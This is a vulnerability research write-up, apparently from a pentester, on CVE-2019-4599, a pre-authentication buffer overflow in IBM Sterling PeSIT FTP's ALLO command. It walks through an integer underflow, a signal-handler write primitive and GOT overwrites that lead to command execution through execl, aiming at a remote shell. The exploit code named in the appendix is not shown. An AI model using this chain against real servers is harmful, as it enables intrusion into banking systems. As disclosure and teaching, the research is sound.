Pentesting a banking FTP service

Introduction

A classical penetration test requires skills to assess a large variety of weaknesses, often dealing with common bug classes. Memory corruptions are rarely exploited during penetration tests. The reasons being, they can be risky (you do not want to crash a production system) and it can be time consuming (if you develop/adapt an exploit). It is also rather uncommon to have the opportunity to exploit a known memory corruption bug with a public script because both vendors and users tend to take their patching very seriously. Nevertheless, these kinds of weaknesses may enable attackers to gather powerful primitives, such as Remote Command Execution or secrets theft.

Furthermore, when it comes to the banking world, it is common sense that this kind of issue shall provoke a mighty fuss, especially if no patch is ever available. Nonetheless, being able to detect memory corruptions during security assessments may avoid technical or economic disasters by just decommissioning the vulnerable service.

Finally, let's be honest: legacy software is almost never audited since the major part is decommissioned whenever possible. However, the remaining part is almost never tested. The reason is simple: this kind of software is often very delicate to patch, leading users to avoid losing time in multiple vulnerability assessments. Typically, the first audit will purportedly pinpoint the most evident weaknesses. Memory corruption bugs that do not lead to crash will almost surely not be exploited, whenever detected.

Consequently, I propose you to follow my analysis for CVE-2019-4599. A path I had to cross during a classical penetration test assessment. I was not expecting such surprise at first :)

The target

IBM Sterling PeSIT FTP service is part of a complete transaction environment, aimed at syncing files between large financial entities in order to track, for instance, foreign banks' cash withdrawal. This principle is called teleclearance.

Of course, those files usage - as well as their content - can vary, yet they are all transferred using some exchange protocol in the end. While international standards recommend using SWIFT, French banks have been using a protocol named PeSIT since the 1980s.

Additionally, an FTP server is included in the Connect:Express software suite. It is used as a fallback protocol in case a PeSIT link cannot be established between two French organizations.

Therefore, below are the main points of attacking the FTP server:

When used by a bank, it is listening on the internet to communicate with other banking entities, although banks may typically position the service behind an IPSEC tunnel FTP protocol itself is one of the most known protocols, whose parts are described in several RFC More importantly, penetration test is more challenging with an exploit writing phase!

The second point is not really relevant since the implementation of FTP protocol does not seem to follow a specification that happens to be critical for the exploitation (RFC 959 p.30/31).

Static analysis

Since the binary is closed source, let's start by disassembling it. Thankfully, the binary is not stripped and most functions are labeled in either French or French/English mix. Looking at the main() function, we can see that local arguments and flags are handled using getopt() as shown in the following screenshot:

Like any typical server, the binary starts by listening for incoming TCP connections. Once a connection has been established from a remote peer, the process gets fork() 'ed and receive_commande() handles TCP payload sent by the client. That is, our main (remote) entry point:

receive_commande() basically invokes two functions:

TCP_RECV() : calls recv()

: calls analyse_commande() : dispatch the FTP command to the appropriate handler

Let's first analyze TCP_RECV() . Here is a simplified version:

void * TCP_RECV ( int mode ) { int fd ; int cur ; if ( mode == 2 ) { // load "more data" (e.g. partial file upload) cur = lit_parm -> buf_lg ; fd = sock_dtp ; } else { [ 0 ] cur = 0 ; fd = sock_dcp ; // incomming connection socket } [ 1 ] lit_parm -> buf_lg = recv ( fd , & lit_parm -> buf [ cur ], lit_parm -> max_len - cur , 0 ); if ( lit_parm -> buf_lg > 0 ) { if ( mode == 1 ) { if ( strf == 2 ) { [ 2 ] lit_parm -> buf_lg -= 2 ; } else { // ... } } else { // ... } } // ... }

In other words, it fills the following struct lit_parm_t structure:

struct lit_parm_t { char * buf ; // pointer to user supplied data int buf_lg ; // length returned by recv() minus 2 // ... int max_len ; // max buffer length }

In particular, lit_parm->buf holds the whole read from the client with recv() [1], where cur == 0 ([0]).

One might notice a very "curious" operation in [2]. Yes, the lit_parm->buf_lg is decremented by 2. Honestly, I don't know why this statement exists but it actually leads to a bug (more on this later).

lit_parm itself is a global variable pointing to data allocated on the heap in init() (invoked at start up before fork() ):

void init () { // ... input_net = malloc ( 130976 ); // ... lit_parm = calloc ( 1uLL , 32uLL ); lit_parm -> buf = input_net ; lit_parm -> buf_lg = 130976 ; lit_parm -> max_len = 130976 ; // ... }

In turn, input_net is also a global variable pointing to the heap. One might notice, that "130976" looks like a MAX_INPUT_SIZE for the buffer.

Once the data has been received with TCP_RECV() , receive_commande() invokes analyse_commande() which is the main command dispatcher. analyse_commande() distinguishes two sets of commands:

pre-authentication: HELP, STAT, USER/PASS, ALLO

post-authentication: all the other commands

From an attack surface point of view, we either need to find a vulnerability in the pre-authentication commands or find a post-authentication bypass and then a vulnerability in the post-authentication commands. In the latter case, we would need "two vulnerabilities". That looks like more "work" and having pre-auth bug is sexier!

After a rough look at the different pre-auth commands, the focus has been set on the ALLO command.

ALLO command handler

The ALLO command (for ALLOcate) is a command that can be called in pre-authentication mode. It is used to allocate a sufficient space prior to a file upload. Typically, the next command shall be STOR for instance.

As the RFC959 stands, the expected grammar is:

ALLO <SP> <decimal-integer> [<SP> R <SP> <decimal-integer>] <CRLF>

Once data has been received in TCP_RECV() (hence both lit_parm->buf and lit_parm->buf_lg have been filled), the ALLO command handler (invoked from analyze_commande() ) tries to do the following:

Find the length of <decimal-integer> (character-wise) If <decimal-integer> is actually a number, copy user-provided data (i.e. <decimal-integer>) into the rem_file buffer

Let's check the implementation:

int i ; // find the number of characters of "<decimal-integer>" (stop at first space or ends of data) [ 0 ] for ( i = 0 ; lit_parm -> buf_lg - 5 > i && lit_parm -> buf [ 5 + i ] != ' ' ; ++ i ) { } [ 1 ] if ( verif_num ( i , ( * lit_parm -> buf + 5 ))) { if ( lit_parm -> buf_lg - 5 < i ) copy_len = i - 1 ; else copy_len = i ; [ 2 ] memcpy ( rem_file , ( * lit_parm -> buf + 5 ), copy_len ); rem_file [ copy_len ] = 0 ; // ...

In order to make things simpler, let's call the string located at 5 bytes past lit_parm->buf : PAYLOAD.

So, the variable i is set to the length of PAYLOAD in [0]. Then, there is a check that PAYLOAD is only composed of digits with verif_num() in [1]. Finally, the buffer rem_file is filled with PAYLOAD of size copy_len in [2].

One might immediately notice that there is no "length checks" during the memcpy() in [2]. It is filled with user-controlled data (PAYLOAD) of size copy_len into rem_file . The global variable rem_file itself is stored in the .bss as a 256 bytes character array.

In other words, passing the following commands leads to a buffer overflow in the .bss:

ALLO 111...<252 times>...111111 ^ start overflowing on the next variable in the .bss

At this point, the only "restriction" on PAYLOAD, is that it must only contain digits as enforced by verif_num() . The latter returns true if PAYLOAD is only composed of digits OR if i is zero.

This could look like the "big win" here yet "big win" does not equal "quick win" :-).

In fact, being restricted to "digit only" characters leads to harder exploitation. In the next section, we will show how to bypass this restriction and overflow the rem_file buffer with almost arbitrary data.

Bypassing verif_num()

In the previous section, we saw that we can trigger a buffer overflow on the .bss but it came with a limitation: our PAYLOAD was restricted to digit characters.

The Implementation

First, let's have a look at the verif_num() implementation:

bool verif_num ( int ctr , char * test_char ) { int i ; for ( i = 0 ; i < ctr && isdigit ( test_char [ i ]); ++ i ) { } return i == ctr ; }

In order to pass the check, the string test_char must be composed of digits characters up to ctr characters.

Furthermore, if ctr is set to zero, verif_num() will always return true.

Back to the ALLO handler code, we saw that verif_num() 's ctr parameter was invoked using the i variables computed here:

for ( i = 0 ; lit_parm -> buf_lg - 5 > i && lit_parm -> buf [ 5 + i ] != ' ' ; ++ i ) { }

and called here:

if ( verif_num ( i , ( lit_parm -> buf + 5 ))) { ... }

Basic Test Cases

Alright, let's analyze this part with some practical data. Here are our test cases:

| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment | | ----- | ------------- | ---------------- | - | ----------- | -------- | ----------------------- | | 0 | 'ALLO ' | 5 | 0 | true | 0 | with one space | | 1 | 'ALLO a' | 6 | 0 | false | n/a | | | 2 | 'ALLO 1' | 7 | 0 | true | 0 | two spaces before digit | | 3 | 'ALLO a' | 7 | 0 | true | 0 | two spaces before char | | 4 | 'ALLO 1' | 6 | 1 | true | 1 | | | 5 | 'ALLO 1 ' | 7 | 1 | true | 1 | one space after | | 6 | 'ALLO 12' | 7 | 2 | true | 2 | |

As we can see in case #0, #1, #4, #5 and #6, verif_num() behaves as expected, as well as the i value is correctly set. In turn, copy_len equals i .

However, looking at case #2 and #3, where two spaces are inserted after the ALLO command, we see that i is always set to zero, thus verif_num() also returns true!

That is, we reach the following code:

[ 0 ] if ( lit_parm -> buf_lg - 5 < i ) copy_len = i - 1 ; // <---- unreachable code ?! else copy_len = i ; [ 1 ] memcpy ( rem_file , lit_parm -> buf + 5 , copy_len );

Back to the case #3, we see that our payload can be ALLO<sp><sp>a or ALLO<sp><sp>aaaaaaa... (two spaces). In other words, by using the "two spaces tricks" we can put some arbitrary data in PAYLOAD.

Alas, in those cases, i is also set to zero, that is, copy_len is set to zero! An overflow of 0 bytes cannot be called as such!

Instead, looking back to the line [0] in the previous snippet, it seems that this condition can never be true as lit_parm->buf_lg has a minimum value of 5... or... does it?

Reconsidering the Test Cases

Remember TCP_RECV() exposed earlier? Yes, there was a "curious line" after the call to recv() :

lit_parm -> buf_lg = recv ( fd , & lit_parm -> buf [ cur ], lit_parm -> max_len - cur , 0 ); // ... lit_parm -> buf_lg -= 2 ; // <---- what the hell ?!

So yeah, our previous test cases are wrong, let's rewrite them!

Back to the computation of i , we see that if lit_parm->buf_lg is lesser than 5 , then i will always be set to zero (it does not iterate in the for loop). Hence, verif_num() always returns true as well!

| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment | | ----- | ------------- | ---------------- | - | ----------- | ---------- | ----------------------- | | 0 | 'ALLO ' | 3 | 0 | true | 0xffffffff | with one space | | 1 | 'ALLO a' | 4 | 0 | true | 0xffffffff | | | 2 | 'ALLO 1' | 5 | 0 | true | 0xffffffff | two spaces before digit | | 3 | 'ALLO a' | 5 | 0 | true | 0xffffffff | two spaces before char | | 4 | 'ALLO 1' | 4 | 0 | true | 0xffffffff | | | 5 | 'ALLO 1 ' | 5 | 0 | true | 0 | one space after | | 6 | 'ALLO 12' | 5 | 0 | true | 0 | |

In other words, if our PAYLOAD has size of zero or one character (no matter what), copy_len is set to 0xffffffff.

This is a INT UNDERFLOW baby, that leads to a huge memcpy() on the .bss !

We might benefit from it, yet it rises two issues:

Overwrite 0xffffffff bytes starting from the .bss will certainly crash the process Can we actually control the data (i.e. the PAYLOAD) and not being limited to zero or one byte?

Abusing Uninitialized Memory

Back to the memcpy() called in the ALLO command handler, we saw that we can trigger a huge buffer overflow on rem_file (located in the .bss section). The code is:

memcpy ( rem_file , lit_parm -> buf + 5 , copy_len );

As a reminder, lit_parm->buf is set and only set in recv() , that is, user-controlled data:

lit_parm -> buf_lg = recv ( fd , & lit_parm -> buf [ cur ], lit_parm -> max_len - cur , 0 );

One thing to note is that lit_parm->buf (initialized in init() before the fork() ) is NEVER RESET between each recv() call! Let's exploit this behavior to overflow the rem_file buffer with arbitrary data.

Basically, the exploitation strategy becomes:

call <5 bytes><ARBITRARY_DATA>: will set the data in lit_parm->buf call ALLO<space><0 or 1 arbitrary byte>: only overwrites the 5 or 6 first bytes of lit_parm->buf and leaves the rest of the buffer untouched.

Of course, we can only control the data up to 130971 (130976 - 5) bytes. This is because of the lit_parm->max_len restriction.

Looking at the memory layout of the process, this will overwrite the whole .bss section before hitting a NULL page and provoke a segfault!

That's one issue solved! There is one more though: how to exploit the fact that the huge overflow (0xffffffff bytes) will provoke a segfault?

Dealing with Huge Overflow

Generally, when a buffer overflow bug overwrites a very large portion of contiguous (virtual) memory, there is a "high probability" that it will provoke a page fault (trying to write to non-mapped memory and/or read-only pages). In those cases, the kernel emits a SIGSEGV signal to the process that is generally killed.

However, looking at the init() function, we see that a lot of various signal handlers are set up:

puts ( "init: ***** signals caught" ); signal ( 1 , 1 ); signal ( 2 , sig_fin ); signal ( 3 , sig_fin ); signal ( 4 , sig_fin ); signal ( 5 , 1 ); signal ( 6 , sig_fin ); signal ( 8 , sig_fin ); signal ( 7 , sig_fin ); signal ( 11 , sig_fin ); // SIGSEGV signal ( 31 , sig_fin ); signal ( 13 , 1 ); signal ( 14 , 1 ); signal ( 15 , sig_fin ); signal ( 20 , 1 ); signal ( 17 , sig_chld ); signal ( 21 , 1 ); signal ( 22 , 1 ); signal ( 29 , 1 ); signal ( 10 , sig_usr1 ); signal ( 12 , sig_usr2 );

Therefore, the binary binds a signal handler for the SIGSEGV signal: sig_fin() . In other words, if our overflow provokes a SIGSEGV during the call to memcpy() , the execution flow is redirected to sig_fin() .

Leveraging Arbitrary write primitive

As shown above, a signal handler is defined around several signals that are sent to the process upon received signals. Let us see what sig_fin() , the handler function, does in this crude pseudo-code view:

* ( trfpar + 235 ) = 8000 ; if ( strf == 1 ) { v3 = e_msg_gtrf ; * e_msg_gtrf -> gap0 = "01" ; v3 -> gap0 [ 2 ] = '4' ; } else { e_msg_gtrf_ = e_msg_gtrf ; * e_msg_gtrf -> gap0 = 14641 ; e_msg_gtrf_ -> gap0 [ 2 ] = 54 ; } memcpy ( e_msg_gtrf -> log_buf , trfpar , 1780uLL ); // <---- HERE v5 = * env_monit ; send_tomqueue ( * env_monit , * ( env_monit + 8 ));

What we notice here is an explicit call to memcpy() GLIBC function. The source and destination parameters are global variables that we can overwrite with the huge buffer overflow. e_msg_gtrf->log_buf would ideally be clobbered to point to the wished write zone, and trfpar new value should be a pointer to the source data to be copied.

As shown below, the variables we need to overwrite are located after rem_file , which is good news for us:

We conclude it is possible to control the first two parameters in the memcpy() call!

Here is a simplified schema of the BSS overwrite right before the Segmentation Fault, hence the call to sig_fin()

Hunting the Arbitrary Execution Primitive

Alright, so far we know that we have an arbitrary write ability of 1780 bytes, no less. How can we abuse it to take control over the execution flow? We saw earlier that the shutdown function sig_fin() was the key for exploiting the service. Nevertheless, it is not unnecessary to mention there is a compelling requirement to succeed in the effort for writing a reliable and fast exploit. Since there is only one chance to control the execution flow before the process ends, the written data must directly lead to command execution if ever possible.

Ideally, we would like to call a function like system() with a controlled parameter that would allow us to execute a reverse shell (connect-back). Alas, system() is not imported by the binary.

Instead, looking at various imported symbols, we figured out that only execl() was available. As a reminder, it has the following signature:

int execl ( const char * path , const char * arg , ...);

More parameters have to be under our control. Four, to spawn a remote shell... We will have to troubleshoot this issue. In the binary, execl() is only invoked in the r_exit() function, which is called by the "parent process" during program exit.

We have no choice but find a way to have execl() called with controlled parameters.

Exploiting the bug

One major pitfall is the copy size (0x6f4 = 1780 bytes) of the write-what-where since it is a hardcoded value. Exploit writers may aim to avoid unpleasant behaviors from the process by trying to only overwrite one of the last addresses in the .got section.

Fortunately for us - and since fork() is called upon every incoming connection -, a crash will not disrupt the parent service so we can let the process crash after we obtain the mighty shell.

Before exploiting for real, let's check the enabled protections for this binary:

Complete memory randomizing and Read-Only RElocations are not enabled at all. As predicted, that makes the Global Offset Table an ideal victim for a good old control flow hijacking, and since the .bss section is mostly under our control, we may use it to store payloads. All we have to do is to overwrite the .got entry of a GLIBC function that is called right after the arbitrary copy, with a known and controlled location address. Easy peasy!

As said earlier, it is safer to overwrite the least entries as possible, to reduce the chances to have the program crash or behave badly. Overwriting the last values facilitates this.

Maybe following the good segfault handler function code could help whilst confronting it to .got candidates. What about send_tom_queue() , which is issued right after the memcpy() call?

memcpy ( e_msg_gtrf -> log_buf , trfpar , 1780uLL ); v5 = * env_monit ; send_tomqueue ( * env_monit , * ( env_monit + 8 ));

time() appears to be a viable candidate since it is among the first running functions after send_tom_queue() is invoked by sig_fin() . It would enable fast execution flow preemption. Unfortunately time() does not carry any parameter; using it directly may undermine the exploit reliability.

However, we should keep in mind that most of the .bss is under our control, and that the software is a state machine that pushes and pulls data variables that are defined globally. The only requirement is to have controlled buffer pointers in the function parameters dedicated registers (RDI, RSI, RDX etc.).

After a quick review, one function looks rather handy and adequate: TCP_SEND() .

As shown above env_param and sock_dcp are used here by send() , which is among the latter parts of the Global Offset Table entries. Luckily, this parameter lies at 0x644778 whereas rem_file , the buffer that we initially overflowed in .bss , lies at 0x63AF60 . This means env_param can be overwritten 38936 bytes ahead of the beginning of our buffer.

Also, to avoid losing the flow or undergoing unexpected crashes, we need to neutralize .got entries that are placed after send() with addresses to ret assembly instruction. This will make any unexpected call to imported functions do nothing and go back to our normal flow.

To sum it up, time@.got should be clobbered to point to TCP_SEND() , who calls send(controlled_param1, controlled_param2, controlled_param3) , and send@.got could be rewritten, therefore calling send() would instead result in calling execl@.plt . This function is imported from GLIBC as per a program function called r_exit() .

The final call should be as such:

execl ( "/bin/sh" , "/bin/sh" "-c" , "echo win" ) ^- path ^- argv [ 0 ] ^- argv [ 1 ] ^- argv [ 2 ]

Hang on chingón...

Only three parameters are controlled when issuing a call to send() . So far, there is no real need to look for another function call ensuring a total control of parameters, to obtain command execution. Indeed this constraint occurs in Bash since it interprets text between quotes as distinct arguments... whereas other language interpreters won't.

Thus, using python -c or perl -e without quotes should work since execl() is not using shell to spawn executable files.

The command execution could then be achieved by using:

execl ( "/usr/bin/perl" , "/usr/bin/perl" , "-e[CMD]" )

Conclusion

Due to its lack of binary protections, it was possible to exploit this software during a penetration test assignment. A properly mitigated binary would have forced us to find another bug for leaking memory addresses, or poison the .bss section much more delicately. It requires another technique to achieve code execution since the Global Offset Table would be in Read Only mode. For instance, since new client sessions are fork() 'ed into a new process that has its memory segments at the same place as the parent.

So one could find the base address by attempting to write at many places and track crashes. Once the randomization is defeated, several techniques - such as overwriting __exit_funcs - lead to execution flow hijacking. It is however probable that a more complex payload execution technique, such as stack pivot + ROP, would be required.

A few other memory corruption bugs might still be exploitable depending on the context, since this kind of application is almost never audited by external researchers. Plus, since the exploit was written during a penetration testing assessment, the provided solution might not be the best one due to time requirements.

Note: A patch was issued to remediate the issue a few months ago. Is it convincing? Maybe :)

Demo

Appendice

Exploit code using python2 pwntools (sorry!)